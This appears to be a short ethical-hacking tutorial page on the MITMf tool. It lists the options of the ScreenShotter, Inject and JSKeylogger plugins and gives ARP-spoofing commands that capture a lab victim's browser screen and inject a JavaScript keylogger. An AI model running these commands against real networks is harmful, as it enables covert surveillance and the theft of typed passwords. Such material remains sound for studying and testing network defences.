MITM - Capturing Screen Of Target & Injecting a Keylogger

ScreenShotter Plugin:

ScreenShotter:

  Uses HTML5 Canvas to render an accurate screenshot of a clients browser

  --screen              Load plugin 'ScreenShotter'

  --interval SECONDS    Interval at which screenshots will be taken (default 10 seconds)

Inject Plugin:

Inject:

  Inject arbitrary content into HTML content

  --inject              Load plugin 'Inject'

  --js-url JS_URL       URL of the JS to inject

  --js-payload JS_PAYLOAD

                        JS string to inject

  --js-file JS_FILE     File containing JS to inject

  --html-url HTML_URL   URL of the HTML to inject

  --html-payload HTML_PAYLOAD

                        HTML string to inject

  --html-file HTML_FILE

                        File containing HTML to inject

  --per-domain          Inject once per domain per client.

  --rate-limit RATE_LIMIT

                        Inject once every RATE_LIMIT seconds per client.

  --count-limit COUNT_LIMIT

                        Inject only COUNT_LIMIT times per client.

  --white-ips IP        Inject content ONLY for these ips (comma seperated)

  --black-ips IP        DO NOT inject content for these ips (comma seperated)

  --white-domains DOMAINS

                        Inject content ONLY for these domains (comma seperated)

  --black-domains DOMAINS

                        DO NOT inject content for these domains (comma seperated)

Test the ScreenShotter on Victim Windows PC.

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --screen

It works perfectly.

JSKeylogger Plugin:

JSKeylogger:

  Injects a javascript keylogger into clients webpages

  --jskeylogger         Load plugin 'JSKeylogger'

Usage:

python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.22 -i eth0 --jskeylogger

It works...

Ethical Hacking - NETWORK PENETRATION TESTING(20)的更多相关文章

  1. Ethical Hacking - NETWORK PENETRATION TESTING(15)

    ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of ...

  2. Ethical Hacking - NETWORK PENETRATION TESTING(22)

    MITM - Wireshark WIreshark is a network protocol analyser that is designed to help network administa ...

  3. Ethical Hacking - NETWORK PENETRATION TESTING(14)

    MITM - ARP Poisoning Theory Man In The Middle Attacks - ARP Poisoning This is one of the most danger ...

  4. Ethical Hacking - NETWORK PENETRATION TESTING(13)

    Nmap Nmap is a network discovery tool that can be used to gather detailed information about any clie ...

  5. Ethical Hacking - NETWORK PENETRATION TESTING(12)

    Post Connection Attacks Sophisticated attacks that can be used after connecting to the target AP. Ga ...

  6. Ethical Hacking - NETWORK PENETRATION TESTING(11)

    Securing your Network From the Above Attacks. Now that we know how to test the security of all known ...

  7. Ethical Hacking - NETWORK PENETRATION TESTING(10)

    WPA Craking WPA was designed to address the issues in WEP and provide better encryption. The main is ...

  8. Ethical Hacking - NETWORK PENETRATION TESTING(8)

    WEP Cracking Basic case Run airdump-ng to log all traffic from the target network. airodump-ng --cha ...

  9. Ethical Hacking - NETWORK PENETRATION TESTING(7)

    Gaining Access to encrypted networks Three main encryption types: 1. WEP 2.WPA 3.WPA2 WEP Cracking W ...

随机推荐

  1. SFTP协议生成公共秘钥文件

    [步骤] 1 ssh方式登录服务器 2 执行命令生成秘钥对 ssh-keygen -t rsa 然后给秘钥文件命名 3.查看当前目录的.ssh目录是否有authorized_keys文件 如果有则把新 ...

  2. Andrew Ng - 深度学习工程师 - Part 1. 神经网络和深度学习(Week 3. 浅层神经网络)

     =================第3周 浅层神经网络=============== ===3..1  神经网络概览=== ===3.2  神经网络表示=== ===3.3  计算神经网络的输出== ...

  3. mysql大表在不停机的情况下增加字段该怎么处理

    MySQL中给一张千万甚至更大量级的表添加字段一直是比较头疼的问题,遇到此情况通常该如果处理?本文通过常见的三种场景进行案例说明. 1. 环境准备 数据库版本: 5.7.25-28(Percona 分 ...

  4. 《Elasticsearch 权威指南》阅读笔记

    书籍地址 https://www.elastic.co/guide/cn/elasticsearch/guide/current/languages.html

  5. docer

    docker默认是不保存文件的,包保存文件需要进行映射 dockerfile编写如下 直接下面的命令会失败 因为run后面的命令/bin/bash会失败,执行的是dockffile中定义的httpd ...

  6. Day10-微信小程序实战-交友小程序-实现删除好友信息与子父组件间通信

    回顾:上一次已经把消息的布局以及样式做好了 效果图: 在removeList.js文件中,messageId就是发起这个消息的用户了 先查看一下自定义组件的生命周期 https://developer ...

  7. 动态自动配置Bean

    概览 接口Condition 用于基于条件的自动配置,和注解@Conditional配合使用,可实现JavaBean的动态自动配置 自定义实现动态配置Bean 定义一个接口和两个实现类 定义两个Con ...

  8. 查看日志文件常用命令:tail,cat,tac,head,echo

    linux查看日志文件内容命令tail.cat.tac.head.echo tail -f test.log你会看到屏幕不断有内容被打印出来. 这时候中断第一个进程Ctrl-C, ---------- ...

  9. 入门大数据---Spring+Mybatis+Phoenix整合

    一.前言 使用 Spring+Mybatis 操作 Phoenix 和操作其他的关系型数据库(如 Mysql,Oracle)在配置上是基本相同的,下面会分别给出 Spring/Spring Boot ...

  10. hive中如何查询除了其中某个字段剩余所有字段

    想要将hive分区表中的某个分区复制到新的分区中,使用如下sql语句 insert overwrite table zcfw_sda.sda04_core_request_base_ratio_ifr ...